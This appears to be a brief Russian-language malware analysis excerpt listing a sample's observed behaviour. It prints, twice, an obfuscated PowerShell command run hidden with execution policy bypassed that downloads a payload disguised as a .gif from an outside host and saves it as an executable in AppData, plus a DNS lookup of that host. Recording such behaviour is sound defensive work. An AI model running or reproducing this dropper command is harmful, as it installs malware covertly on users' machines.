Техническая информация
- http://www.iemailpremium.com/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwErSHeLL.EXE -exECUTioNPoliCy bypAsS -NOpROFilE -WiNdoWstyLe hIDDen (NEW-objecT systEM.NEt.WebClienT).doWnloADfile('http://www.iemailpremium.com/read.php?f=1.gif','%ApPDATA%.EXE'...
- DNS ASK ie####premium.com
- '<SYSTEM32>\cmd.exe' /c "pOwErSHeLL.EXE -exECUTioNPoliCy bypAsS -NOpROFilE -WiNdoWstyLe hIDDen (NEW-objecT systEM.NEt.WebClienT).doWnloADfile('http://www.iemailpremium.com/read.php?f=1.gif','%ApPDATA%.EXE'...' (со скрытым окном)